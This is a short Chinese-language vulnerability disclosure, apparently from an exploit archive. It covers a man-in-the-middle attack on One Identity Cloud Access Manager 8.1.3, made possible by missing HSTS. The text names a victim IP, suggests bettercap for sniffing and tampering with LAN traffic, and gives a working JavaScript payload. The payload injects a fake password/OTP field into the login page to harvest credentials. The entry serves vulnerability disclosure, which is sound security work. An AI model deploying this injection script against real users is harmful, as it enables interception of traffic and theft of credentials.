漏洞标题:MITM - 缺失HSTS导致凭据窃取和内容篡改
日期:07/10/2019
漏洞作者:Furqan Khan
厂商主页:https://www.oneidentity.com/
软件链接:https://www.oneidentity.com/products/cloud-access-manager/
版本:8.1.3
测试环境:Kali Linux , Windows 7 ,Ubantu 16.04
这里192.168.1.103是受害者的IP地址。如果我们不知道,我们可以使用bettercap来嗅探和操纵整个LAN(攻击者和受害者的共同网络)的内容。
<script>
function replace_payload()
{
var append_str='<div class="wrap-input100 validate-input m-b-20" data-validate="Password"><input class="cui-textbox" type="password" id="passwordTextbox" name="passwordTextbox"><span class="focus-cui-textbox" data-placeholder="OTP"></span></div>';
var text_div=$(".m-b-20");
text_div.append(append_str);
}
function control(){setTimeout(replace_payload,2000);} control();
</script>